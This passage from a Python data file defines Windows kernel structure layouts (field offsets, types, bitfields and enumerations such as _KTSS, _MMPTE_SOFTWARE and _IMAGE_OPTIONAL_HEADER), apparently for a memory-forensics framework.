'SystemPowerState' : [ 0x3c, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'DevicePowerState' : [ 0x40, ['Enumeration', dict(target = 'long', choices = {0: 'PowerDeviceUnspecified', 1: 'PowerDeviceD0', 2: 'PowerDeviceD1', 3: 'PowerDeviceD2', 4: 'PowerDeviceD3', 5: 'PowerDeviceMaximum'})]],
} ],
'_EXCEPTION_REGISTRATION_RECORD' : [ 0x8, {
'Next' : [ 0x0, ['pointer', ['_EXCEPTION_REGISTRATION_RECORD']]],
'Handler' : [ 0x4, ['pointer', ['void']]],
} ],
'_SID_AND_ATTRIBUTES' : [ 0x8, {
'Sid' : [ 0x0, ['pointer', ['void']]],
'Attributes' : [ 0x4, ['unsigned long']],
} ],
'_SID_IDENTIFIER_AUTHORITY' : [ 0x6, {
'Value' : [ 0x0, ['array', 6, ['unsigned char']]],
} ],
'_IO_WORKITEM' : [ 0x20, {
'WorkItem' : [ 0x0, ['_WORK_QUEUE_ITEM']],
'Routine' : [ 0x10, ['pointer', ['void']]],
'IoObject' : [ 0x14, ['pointer', ['void']]],
'Context' : [ 0x18, ['pointer', ['void']]],
'Type' : [ 0x1c, ['unsigned long']],
} ],
'_CM_RM' : [ 0x58, {
'RmListEntry' : [ 0x0, ['_LIST_ENTRY']],
'TransactionListHead' : [ 0x8, ['_LIST_ENTRY']],
'TmHandle' : [ 0x10, ['pointer', ['void']]],
'Tm' : [ 0x14, ['pointer', ['void']]],
'RmHandle' : [ 0x18, ['pointer', ['void']]],
'KtmRm' : [ 0x1c, ['pointer', ['void']]],
'RefCount' : [ 0x20, ['unsigned long']],
'ContainerNum' : [ 0x24, ['unsigned long']],
'ContainerSize' : [ 0x28, ['unsigned long long']],
'CmHive' : [ 0x30, ['pointer', ['_CMHIVE']]],
'LogFileObject' : [ 0x34, ['pointer', ['void']]],
'MarshallingContext' : [ 0x38, ['pointer', ['void']]],
'RmFlags' : [ 0x3c, ['unsigned long']],
'LogStartStatus1' : [ 0x40, ['long']],
'LogStartStatus2' : [ 0x44, ['long']],
'BaseLsn' : [ 0x48, ['unsigned long long']],
'RmLock' : [ 0x50, ['pointer', ['_ERESOURCE']]],
} ],
'_CHILD_LIST' : [ 0x8, {
'Count' : [ 0x0, ['unsigned long']],
'List' : [ 0x4, ['unsigned long']],
} ],
'_MMVAD_FLAGS' : [ 0x4, {
'CommitCharge' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 19, native_type='unsigned long')]],
'NoChange' : [ 0x0, ['BitField', dict(start_bit = 19, end_bit = 20, native_type='unsigned long')]],
'VadType' : [ 0x0, ['BitField', dict(start_bit = 20, end_bit = 23, native_type='unsigned long')]],
'MemCommit' : [ 0x0, ['BitField', dict(start_bit = 23, end_bit = 24, native_type='unsigned long')]],
'Protection' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 29, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 29, end_bit = 31, native_type='unsigned long')]],
'PrivateMemory' : [ 0x0, ['BitField', dict(start_bit = 31, end_bit = 32, native_type='unsigned long')]],
} ],
'_MMWSLE_HASH' : [ 0x4, {
'Index' : [ 0x0, ['unsigned long']],
} ],
'_STRING32' : [ 0x8, {
'Length' : [ 0x0, ['unsigned short']],
'MaximumLength' : [ 0x2, ['unsigned short']],
'Buffer' : [ 0x4, ['unsigned long']],
} ],
'_DBGKD_FILL_MEMORY' : [ 0x10, {
'Address' : [ 0x0, ['unsigned long long']],
'Length' : [ 0x8, ['unsigned long']],
'Flags' : [ 0xc, ['unsigned short']],
'PatternLength' : [ 0xe, ['unsigned short']],
} ],
'_HEAP_STOP_ON_VALUES' : [ 0x18, {
'AllocAddress' : [ 0x0, ['unsigned long']],
'AllocTag' : [ 0x4, ['_HEAP_STOP_ON_TAG']],
'ReAllocAddress' : [ 0x8, ['unsigned long']],
'ReAllocTag' : [ 0xc, ['_HEAP_STOP_ON_TAG']],
'FreeAddress' : [ 0x10, ['unsigned long']],
'FreeTag' : [ 0x14, ['_HEAP_STOP_ON_TAG']],
} ],
'_HEAP_PSEUDO_TAG_ENTRY' : [ 0xc, {
'Allocs' : [ 0x0, ['unsigned long']],
'Frees' : [ 0x4, ['unsigned long']],
'Size' : [ 0x8, ['unsigned long']],
} ],
'_CALL_HASH_ENTRY' : [ 0x14, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'CallersAddress' : [ 0x8, ['pointer', ['void']]],
'CallersCaller' : [ 0xc, ['pointer', ['void']]],
'CallCount' : [ 0x10, ['unsigned long']],
} ],
'_VF_TRACKER_STAMP' : [ 0x8, {
'Thread' : [ 0x0, ['pointer', ['void']]],
'Flags' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned char')]],
'OldIrql' : [ 0x5, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned char')]],
'NewIrql' : [ 0x6, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned char')]],
'Processor' : [ 0x7, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned char')]],
} ],
'_VI_TRACK_IRQL' : [ 0x20, {
'Thread' : [ 0x0, ['pointer', ['void']]],
'OldIrql' : [ 0x4, ['unsigned char']],
'NewIrql' : [ 0x5, ['unsigned char']],
'Processor' : [ 0x6, ['unsigned short']],
'TickCount' : [ 0x8, ['unsigned long']],
'StackTrace' : [ 0xc, ['array', 5, ['pointer', ['void']]]],
} ],
'_PNP_DEVICE_EVENT_ENTRY' : [ 0x64, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Argument' : [ 0x8, ['unsigned long']],
'CallerEvent' : [ 0xc, ['pointer', ['_KEVENT']]],
'Callback' : [ 0x10, ['pointer', ['void']]],
'Context' : [ 0x14, ['pointer', ['void']]],
'VetoType' : [ 0x18, ['pointer', ['Enumeration', dict(target = 'long', choices = {0: 'PNP_VetoTypeUnknown', 1: 'PNP_VetoLegacyDevice', 2: 'PNP_VetoPendingClose', 3: 'PNP_VetoWindowsApp', 4: 'PNP_VetoWindowsService', 5: 'PNP_VetoOutstandingOpen', 6: 'PNP_VetoDevice', 7: 'PNP_VetoDriver', 8: 'PNP_VetoIllegalDeviceRequest', 9: 'PNP_VetoInsufficientPower', 10: 'PNP_VetoNonDisableable', 11: 'PNP_VetoLegacyDriver', 12: 'PNP_VetoInsufficientRights'})]]],
'VetoName' : [ 0x1c, ['pointer', ['_UNICODE_STRING']]],
'Data' : [ 0x20, ['_PLUGPLAY_EVENT_BLOCK']],
} ],
'_HEAP_STOP_ON_TAG' : [ 0x4, {
'HeapAndTagIndex' : [ 0x0, ['unsigned long']],
'TagIndex' : [ 0x0, ['unsigned short']],
'HeapIndex' : [ 0x2, ['unsigned short']],
} ],
'_DBGKD_GET_CONTEXT' : [ 0x4, {
'Unused' : [ 0x0, ['unsigned long']],
} ],
'_TEB_ACTIVE_FRAME_CONTEXT' : [ 0x8, {
'Flags' : [ 0x0, ['unsigned long']],
'FrameName' : [ 0x4, ['pointer', ['unsigned char']]],
} ],
'_NLS_DATA_BLOCK' : [ 0xc, {
'AnsiCodePageData' : [ 0x0, ['pointer', ['void']]],
'OemCodePageData' : [ 0x4, ['pointer', ['void']]],
'UnicodeCaseTableData' : [ 0x8, ['pointer', ['void']]],
} ],
'_ALIGNED_AFFINITY_SUMMARY' : [ 0x40, {
'CpuSet' : [ 0x0, ['_KAFFINITY_EX']],
'SMTSet' : [ 0xc, ['_KAFFINITY_EX']],
} ],
'_XSTATE_CONFIGURATION' : [ 0x210, {
'EnabledFeatures' : [ 0x0, ['unsigned long long']],
'Size' : [ 0x8, ['unsigned long']],
'OptimizedSave' : [ 0xc, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Features' : [ 0x10, ['array', 64, ['_XSTATE_FEATURE']]],
} ],
'_CM_KEY_SECURITY_CACHE' : [ 0x2c, {
'Cell' : [ 0x0, ['unsigned long']],
'ConvKey' : [ 0x4, ['unsigned long']],
'List' : [ 0x8, ['_LIST_ENTRY']],
'DescriptorLength' : [ 0x10, ['unsigned long']],
'RealRefCount' : [ 0x14, ['unsigned long']],
'Descriptor' : [ 0x18, ['_SECURITY_DESCRIPTOR_RELATIVE']],
} ],
'_MMPTE_SOFTWARE' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'PageFileLow' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 5, native_type='unsigned long')]],
'Protection' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 10, native_type='unsigned long')]],
'Prototype' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'Transition' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'PageFileHigh' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_NT_TIB32' : [ 0x1c, {
'ExceptionList' : [ 0x0, ['unsigned long']],
'StackBase' : [ 0x4, ['unsigned long']],
'StackLimit' : [ 0x8, ['unsigned long']],
'SubSystemTib' : [ 0xc, ['unsigned long']],
'FiberData' : [ 0x10, ['unsigned long']],
'Version' : [ 0x10, ['unsigned long']],
'ArbitraryUserPointer' : [ 0x14, ['unsigned long']],
'Self' : [ 0x18, ['unsigned long']],
} ],
'_CM_RESOURCE_LIST' : [ 0x24, {
'Count' : [ 0x0, ['unsigned long']],
'List' : [ 0x4, ['array', 1, ['_CM_FULL_RESOURCE_DESCRIPTOR']]],
} ],
'_POOL_TRACKER_TABLE' : [ 0x1c, {
'Key' : [ 0x0, ['long']],
'NonPagedAllocs' : [ 0x4, ['long']],
'NonPagedFrees' : [ 0x8, ['long']],
'NonPagedBytes' : [ 0xc, ['unsigned long']],
'PagedAllocs' : [ 0x10, ['unsigned long']],
'PagedFrees' : [ 0x14, ['unsigned long']],
'PagedBytes' : [ 0x18, ['unsigned long']],
} ],
'_MM_SUBSECTION_AVL_TABLE' : [ 0x20, {
'BalancedRoot' : [ 0x0, ['_MMSUBSECTION_NODE']],
'DepthOfTree' : [ 0x18, ['BitField', dict(start_bit = 0, end_bit = 5, native_type='unsigned long')]],
'Unused' : [ 0x18, ['BitField', dict(start_bit = 5, end_bit = 8, native_type='unsigned long')]],
'NumberGenericTableElements' : [ 0x18, ['BitField', dict(start_bit = 8, end_bit = 32, native_type='unsigned long')]],
'NodeHint' : [ 0x1c, ['pointer', ['void']]],
} ],
'_HANDLE_TABLE_ENTRY_INFO' : [ 0x4, {
'AuditMask' : [ 0x0, ['unsigned long']],
} ],
'_CM_FULL_RESOURCE_DESCRIPTOR' : [ 0x20, {
'InterfaceType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'Internal', 1: 'Isa', 2: 'Eisa', 3: 'MicroChannel', 4: 'TurboChannel', 5: 'PCIBus', 6: 'VMEBus', 7: 'NuBus', 8: 'PCMCIABus', 9: 'CBus', 10: 'MPIBus', 11: 'MPSABus', 12: 'ProcessorInternal', 13: 'InternalPowerBus', 14: 'PNPISABus', 15: 'PNPBus', 16: 'Vmcs', 17: 'MaximumInterfaceType', -1: 'InterfaceTypeUndefined'})]],
'BusNumber' : [ 0x4, ['unsigned long']],
'PartialResourceList' : [ 0x8, ['_CM_PARTIAL_RESOURCE_LIST']],
} ],
'_WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_FLAGS' : [ 0x4, {
'Primary' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ContainmentWarning' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Reset' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'ThresholdExceeded' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'ResourceNotAvailable' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'LatentError' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 32, native_type='unsigned long')]],
'AsULONG' : [ 0x0, ['unsigned long']],
} ],
'_WMI_BUFFER_HEADER' : [ 0x48, {
'BufferSize' : [ 0x0, ['unsigned long']],
'SavedOffset' : [ 0x4, ['unsigned long']],
'CurrentOffset' : [ 0x8, ['unsigned long']],
'ReferenceCount' : [ 0xc, ['long']],
'TimeStamp' : [ 0x10, ['_LARGE_INTEGER']],
'SequenceNumber' : [ 0x18, ['long long']],
'Padding0' : [ 0x20, ['array', 2, ['unsigned long']]],
'SlistEntry' : [ 0x20, ['_SINGLE_LIST_ENTRY']],
'NextBuffer' : [ 0x20, ['pointer', ['_WMI_BUFFER_HEADER']]],
'ClientContext' : [ 0x28, ['_ETW_BUFFER_CONTEXT']],
'State' : [ 0x2c, ['Enumeration', dict(target = 'long', choices = {0: 'EtwBufferStateFree', 1: 'EtwBufferStateGeneralLogging', 2: 'EtwBufferStateCSwitch', 3: 'EtwBufferStateFlush', 4: 'EtwBufferStateMaximum'})]],
'Offset' : [ 0x30, ['unsigned long']],
'BufferFlag' : [ 0x34, ['unsigned short']],
'BufferType' : [ 0x36, ['unsigned short']],
'Padding1' : [ 0x38, ['array', 4, ['unsigned long']]],
'ReferenceTime' : [ 0x38, ['_ETW_REF_CLOCK']],
'GlobalEntry' : [ 0x38, ['_LIST_ENTRY']],
'Pointer0' : [ 0x38, ['pointer', ['void']]],
'Pointer1' : [ 0x3c, ['pointer', ['void']]],
} ],
'_NT_TIB64' : [ 0x38, {
'ExceptionList' : [ 0x0, ['unsigned long long']],
'StackBase' : [ 0x8, ['unsigned long long']],
'StackLimit' : [ 0x10, ['unsigned long long']],
'SubSystemTib' : [ 0x18, ['unsigned long long']],
'FiberData' : [ 0x20, ['unsigned long long']],
'Version' : [ 0x20, ['unsigned long']],
'ArbitraryUserPointer' : [ 0x28, ['unsigned long long']],
'Self' : [ 0x30, ['unsigned long long']],
} ],
'_POWER_SEQUENCE' : [ 0xc, {
'SequenceD1' : [ 0x0, ['unsigned long']],
'SequenceD2' : [ 0x4, ['unsigned long']],
'SequenceD3' : [ 0x8, ['unsigned long']],
} ],
'_PROCESSOR_POWER_STATE' : [ 0xc8, {
'IdleStates' : [ 0x0, ['pointer', ['_PPM_IDLE_STATES']]],
'IdleTimeLast' : [ 0x8, ['unsigned long long']],
'IdleTimeTotal' : [ 0x10, ['unsigned long long']],
'IdleTimeEntry' : [ 0x18, ['unsigned long long']],
'IdleAccounting' : [ 0x20, ['pointer', ['_PROC_IDLE_ACCOUNTING']]],
'Hypervisor' : [ 0x24, ['Enumeration', dict(target = 'long', choices = {0: 'ProcHypervisorNone', 1: 'ProcHypervisorPresent', 2: 'ProcHypervisorPower'})]],
'PerfHistoryTotal' : [ 0x28, ['unsigned long']],
'ThermalConstraint' : [ 0x2c, ['unsigned char']],
'PerfHistoryCount' : [ 0x2d, ['unsigned char']],
'PerfHistorySlot' : [ 0x2e, ['unsigned char']],
'Reserved' : [ 0x2f, ['unsigned char']],
'LastSysTime' : [ 0x30, ['unsigned long']],
'WmiDispatchPtr' : [ 0x34, ['unsigned long']],
'WmiInterfaceEnabled' : [ 0x38, ['long']],
'FFHThrottleStateInfo' : [ 0x40, ['_PPM_FFH_THROTTLE_STATE_INFO']],
'PerfActionDpc' : [ 0x60, ['_KDPC']],
'PerfActionMask' : [ 0x80, ['long']],
'IdleCheck' : [ 0x88, ['_PROC_IDLE_SNAP']],
'PerfCheck' : [ 0x98, ['_PROC_IDLE_SNAP']],
'Domain' : [ 0xa8, ['pointer', ['_PROC_PERF_DOMAIN']]],
'PerfConstraint' : [ 0xac, ['pointer', ['_PROC_PERF_CONSTRAINT']]],
'Load' : [ 0xb0, ['pointer', ['_PROC_PERF_LOAD']]],
'PerfHistory' : [ 0xb4, ['pointer', ['_PROC_HISTORY_ENTRY']]],
'Utility' : [ 0xb8, ['unsigned long']],
'OverUtilizedHistory' : [ 0xbc, ['unsigned long']],
'AffinityCount' : [ 0xc0, ['unsigned long']],
'AffinityHistory' : [ 0xc4, ['unsigned long']],
} ],
'_OBJECT_REF_STACK_INFO' : [ 0xc, {
'Sequence' : [ 0x0, ['unsigned long']],
'Index' : [ 0x4, ['unsigned short']],
'NumTraces' : [ 0x6, ['unsigned short']],
'Tag' : [ 0x8, ['unsigned long']],
} ],
'_PPC_DBGKD_CONTROL_SET' : [ 0xc, {
'Continue' : [ 0x0, ['unsigned long']],
'CurrentSymbolStart' : [ 0x4, ['unsigned long']],
'CurrentSymbolEnd' : [ 0x8, ['unsigned long']],
} ],
'_MMPFNENTRY' : [ 0x2, {
'PageLocation' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned char')]],
'WriteInProgress' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'Modified' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'ReadInProgress' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'CacheAttribute' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 8, native_type='unsigned char')]],
'Priority' : [ 0x1, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned char')]],
'Rom' : [ 0x1, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'InPageError' : [ 0x1, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'KernelStack' : [ 0x1, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'RemovalRequested' : [ 0x1, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'ParityError' : [ 0x1, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
} ],
'_SEGMENT_OBJECT' : [ 0x28, {
'BaseAddress' : [ 0x0, ['pointer', ['void']]],
'TotalNumberOfPtes' : [ 0x4, ['unsigned long']],
'SizeOfSegment' : [ 0x8, ['_LARGE_INTEGER']],
'NonExtendedPtes' : [ 0x10, ['unsigned long']],
'ImageCommitment' : [ 0x14, ['unsigned long']],
'ControlArea' : [ 0x18, ['pointer', ['_CONTROL_AREA']]],
'Subsection' : [ 0x1c, ['pointer', ['_SUBSECTION']]],
'MmSectionFlags' : [ 0x20, ['pointer', ['_MMSECTION_FLAGS']]],
'MmSubSectionFlags' : [ 0x24, ['pointer', ['_MMSUBSECTION_FLAGS']]],
} ],
'_PCW_CALLBACK_INFORMATION' : [ 0x20, {
'AddCounter' : [ 0x0, ['_PCW_COUNTER_INFORMATION']],
'RemoveCounter' : [ 0x0, ['_PCW_COUNTER_INFORMATION']],
'EnumerateInstances' : [ 0x0, ['_PCW_MASK_INFORMATION']],
'CollectData' : [ 0x0, ['_PCW_MASK_INFORMATION']],
} ],
'_KTSS' : [ 0x20ac, {
'Backlink' : [ 0x0, ['unsigned short']],
'Reserved0' : [ 0x2, ['unsigned short']],
'Esp0' : [ 0x4, ['unsigned long']],
'Ss0' : [ 0x8, ['unsigned short']],
'Reserved1' : [ 0xa, ['unsigned short']],
'NotUsed1' : [ 0xc, ['array', 4, ['unsigned long']]],
'CR3' : [ 0x1c, ['unsigned long']],
'Eip' : [ 0x20, ['unsigned long']],
'EFlags' : [ 0x24, ['unsigned long']],
'Eax' : [ 0x28, ['unsigned long']],
'Ecx' : [ 0x2c, ['unsigned long']],
'Edx' : [ 0x30, ['unsigned long']],
'Ebx' : [ 0x34, ['unsigned long']],
'Esp' : [ 0x38, ['unsigned long']],
'Ebp' : [ 0x3c, ['unsigned long']],
'Esi' : [ 0x40, ['unsigned long']],
'Edi' : [ 0x44, ['unsigned long']],
'Es' : [ 0x48, ['unsigned short']],
'Reserved2' : [ 0x4a, ['unsigned short']],
'Cs' : [ 0x4c, ['unsigned short']],
'Reserved3' : [ 0x4e, ['unsigned short']],
'Ss' : [ 0x50, ['unsigned short']],
'Reserved4' : [ 0x52, ['unsigned short']],
'Ds' : [ 0x54, ['unsigned short']],
'Reserved5' : [ 0x56, ['unsigned short']],
'Fs' : [ 0x58, ['unsigned short']],
'Reserved6' : [ 0x5a, ['unsigned short']],
'Gs' : [ 0x5c, ['unsigned short']],
'Reserved7' : [ 0x5e, ['unsigned short']],
'LDT' : [ 0x60, ['unsigned short']],
'Reserved8' : [ 0x62, ['unsigned short']],
'Flags' : [ 0x64, ['unsigned short']],
'IoMapBase' : [ 0x66, ['unsigned short']],
'IoMaps' : [ 0x68, ['array', 1, ['_KiIoAccessMap']]],
'IntDirectionMap' : [ 0x208c, ['array', 32, ['unsigned char']]],
} ],
'_TOKEN_SOURCE' : [ 0x10, {
'SourceName' : [ 0x0, ['array', 8, ['unsigned char']]],
'SourceIdentifier' : [ 0x8, ['_LUID']],
} ],
'_DBGKD_QUERY_MEMORY' : [ 0x18, {
'Address' : [ 0x0, ['unsigned long long']],
'Reserved' : [ 0x8, ['unsigned long long']],
'AddressSpace' : [ 0x10, ['unsigned long']],
'Flags' : [ 0x14, ['unsigned long']],
} ],
'_KIDTENTRY' : [ 0x8, {
'Offset' : [ 0x0, ['unsigned short']],
'Selector' : [ 0x2, ['unsigned short']],
'Access' : [ 0x4, ['unsigned short']],
'ExtendedOffset' : [ 0x6, ['unsigned short']],
} ],
'DOCK_INTERFACE' : [ 0x18, {
'Size' : [ 0x0, ['unsigned short']],
'Version' : [ 0x2, ['unsigned short']],
'Context' : [ 0x4, ['pointer', ['void']]],
'InterfaceReference' : [ 0x8, ['pointer', ['void']]],
'InterfaceDereference' : [ 0xc, ['pointer', ['void']]],
'ProfileDepartureSetMode' : [ 0x10, ['pointer', ['void']]],
'ProfileDepartureUpdate' : [ 0x14, ['pointer', ['void']]],
} ],
'CMP_OFFSET_ARRAY' : [ 0xc, {
'FileOffset' : [ 0x0, ['unsigned long']],
'DataBuffer' : [ 0x4, ['pointer', ['void']]],
'DataLength' : [ 0x8, ['unsigned long']],
} ],
'_MMSUPPORT_FLAGS' : [ 0x4, {
'WorkingSetType' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned char')]],
'ModwriterAttached' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'TrimHard' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'MaximumWorkingSetHard' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'ForceTrim' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'MinimumWorkingSetHard' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
'SessionMaster' : [ 0x1, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'TrimmerState' : [ 0x1, ['BitField', dict(start_bit = 1, end_bit = 3, native_type='unsigned char')]],
'Reserved' : [ 0x1, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'PageStealers' : [ 0x1, ['BitField', dict(start_bit = 4, end_bit = 8, native_type='unsigned char')]],
'MemoryPriority' : [ 0x2, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned char')]],
'WsleDeleted' : [ 0x3, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'VmExiting' : [ 0x3, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'ExpansionFailed' : [ 0x3, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'Available' : [ 0x3, ['BitField', dict(start_bit = 3, end_bit = 8, native_type='unsigned char')]],
} ],
'_IMAGE_OPTIONAL_HEADER' : [ 0xe0, {
'Magic' : [ 0x0, ['unsigned short']],
'MajorLinkerVersion' : [ 0x2, ['unsigned char']],
'MinorLinkerVersion' : [ 0x3, ['unsigned char']],
'SizeOfCode' : [ 0x4, ['unsigned long']],
'SizeOfInitializedData' : [ 0x8, ['unsigned long']],
'SizeOfUninitializedData' : [ 0xc, ['unsigned long']],
'AddressOfEntryPoint' : [ 0x10, ['unsigned long']],
'BaseOfCode' : [ 0x14, ['unsigned long']],
'BaseOfData' : [ 0x18, ['unsigned long']],
'ImageBase' : [ 0x1c, ['unsigned long']],
'SectionAlignment' : [ 0x20, ['unsigned long']],
'FileAlignment' : [ 0x24, ['unsigned long']],
'MajorOperatingSystemVersion' : [ 0x28, ['unsigned short']],
'MinorOperatingSystemVersion' : [ 0x2a, ['unsigned short']],
'MajorImageVersion' : [ 0x2c, ['unsigned short']],
'MinorImageVersion' : [ 0x2e, ['unsigned short']],
'MajorSubsystemVersion' : [ 0x30, ['unsigned short']],
'MinorSubsystemVersion' : [ 0x32, ['unsigned short']],
'Win32VersionValue' : [ 0x34, ['unsigned long']],
'SizeOfImage' : [ 0x38, ['unsigned long']],
'SizeOfHeaders' : [ 0x3c, ['unsigned long']],
'CheckSum' : [ 0x40, ['unsigned long']],
'Subsystem' : [ 0x44, ['unsigned short']],
'DllCharacteristics' : [ 0x46, ['unsigned short']],
'SizeOfStackReserve' : [ 0x48, ['unsigned long']],
'SizeOfStackCommit' : [ 0x4c, ['unsigned long']],
'SizeOfHeapReserve' : [ 0x50, ['unsigned long']],
'SizeOfHeapCommit' : [ 0x54, ['unsigned long']],
'LoaderFlags' : [ 0x58, ['unsigned long']],
'NumberOfRvaAndSizes' : [ 0x5c, ['unsigned long']],
'DataDirectory' : [ 0x60, ['array', 16, ['_IMAGE_DATA_DIRECTORY']]],
} ],
'_ALPC_COMPLETION_PACKET_LOOKASIDE' : [ 0x30, {
'Lock' : [ 0x0, ['unsigned long']],
'Size' : [ 0x4, ['unsigned long']],
'ActiveCount' : [ 0x8, ['unsigned long']],
'PendingNullCount' : [ 0xc, ['unsigned long']],
'PendingCheckCompletionListCount' : [ 0x10, ['unsigned long']],
'PendingDelete' : [ 0x14, ['unsigned long']],
'FreeListHead' : [ 0x18, ['_SINGLE_LIST_ENTRY']],
'CompletionPort' : [ 0x1c, ['pointer', ['void']]],
'CompletionKey' : [ 0x20, ['pointer', ['void']]],
'Entry' : [ 0x24, ['array', 1, ['_ALPC_COMPLETION_PACKET_LOOKASIDE_ENTRY']]],
} ],
'_TERMINATION_PORT' : [ 0x8, {
'Next' : [ 0x0, ['pointer', ['_TERMINATION_PORT']]],
'Port' : [ 0x4, ['pointer', ['void']]],
} ],
'_MEMORY_ALLOCATION_DESCRIPTOR' : [ 0x14, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'MemoryType' : [ 0x8, ['Enumeration', dict(target = 'long', choices = {0: 'LoaderExceptionBlock', 1: 'LoaderSystemBlock', 2: 'LoaderFree', 3: 'LoaderBad', 4: 'LoaderLoadedProgram', 5: 'LoaderFirmwareTemporary', 6: 'LoaderFirmwarePermanent', 7: 'LoaderOsloaderHeap', 8: 'LoaderOsloaderStack', 9: 'LoaderSystemCode', 10: 'LoaderHalCode', 11: 'LoaderBootDriver', 12: 'LoaderConsoleInDriver', 13: 'LoaderConsoleOutDriver', 14: 'LoaderStartupDpcStack', 15: 'LoaderStartupKernelStack', 16: 'LoaderStartupPanicStack', 17: 'LoaderStartupPcrPage', 18: 'LoaderStartupPdrPage', 19: 'LoaderRegistryData', 20: 'LoaderMemoryData', 21: 'LoaderNlsData', 22: 'LoaderSpecialMemory', 23: 'LoaderBBTMemory', 24: 'LoaderReserve', 25: 'LoaderXIPRom', 26: 'LoaderHALCachedMemory', 27: 'LoaderLargePageFiller', 28: 'LoaderErrorLogMemory', 29: 'LoaderMaximum'})]],
'BasePage' : [ 0xc, ['unsigned long']],
'PageCount' : [ 0x10, ['unsigned long']],
} ],
'_CM_INTENT_LOCK' : [ 0x8, {
'OwnerCount' : [ 0x0, ['unsigned long']],
'OwnerTable' : [ 0x4, ['pointer', ['pointer', ['_CM_KCB_UOW']]]],
} ],
'_PROC_IDLE_ACCOUNTING' : [ 0x2c0, {
'StateCount' : [ 0x0, ['unsigned long']],
'TotalTransitions' : [ 0x4, ['unsigned long']],
'ResetCount' : [ 0x8, ['unsigned long']],
'StartTime' : [ 0x10, ['unsigned long long']],
'BucketLimits' : [ 0x18, ['array', 16, ['unsigned long long']]],
'State' : [ 0x98, ['array', 1, ['_PROC_IDLE_STATE_ACCOUNTING']]],
} ],
'_THERMAL_INFORMATION' : [ 0x4c, {
'ThermalStamp' : [ 0x0, ['unsigned long']],
'ThermalConstant1' : [ 0x4, ['unsigned long']],
'ThermalConstant2' : [ 0x8, ['unsigned long']],
'Processors' : [ 0xc, ['unsigned long']],
'SamplingPeriod' : [ 0x10, ['unsigned long']],
'CurrentTemperature' : [ 0x14, ['unsigned long']],
'PassiveTripPoint' : [ 0x18, ['unsigned long']],
'CriticalTripPoint' : [ 0x1c, ['unsigned long']],
'ActiveTripPointCount' : [ 0x20, ['unsigned char']],
'ActiveTripPoint' : [ 0x24, ['array', 10, ['unsigned long']]],
} ],
'_MAPPED_FILE_SEGMENT' : [ 0x20, {
'ControlArea' : [ 0x0, ['pointer', ['_CONTROL_AREA']]],
'TotalNumberOfPtes' : [ 0x4, ['unsigned long']],
'SegmentFlags' : [ 0x8, ['_SEGMENT_FLAGS']],
'NumberOfCommittedPages' : [ 0xc, ['unsigned long']],
